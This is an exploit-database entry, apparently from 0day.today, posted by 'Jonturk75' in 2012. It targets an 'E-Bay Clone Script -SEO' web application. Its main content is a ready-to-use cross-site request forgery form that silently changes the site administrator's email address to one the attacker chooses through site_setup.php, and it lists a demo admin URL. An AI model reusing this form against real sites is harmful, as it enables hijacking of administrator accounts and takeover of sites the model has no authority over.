id: 17680
date: 03/12/2012
title: E-Bay Clone Script -SEO CSRF
author: Jonturk75
cves: 

# Exploit Title: E-Bay Clone Script -SEO CSRF 
# Author: Jonturk75
# Vendor or Software Link: http://www.scripts.com/viewscript/ebay-clone-script-seo/31534/
# Category::  webapps
# Demo : http://ebayclone.subtabz.com/admin
# Greetz: Inj3ct0r Exploit DataBase 1337day.com


<form name="form_site_setup" method="post" action="target.com/[PATH]/site_setup.php" enctype="multipart/form-data">
<input type="hidden" size="50" value="your@mail.com" id="admin_email" name="admin_email"/>
<input type="submit" value="Save Changes" class="submit" name="form_save_settings"/>
</form>



#  0day.today [2023-03-25]  #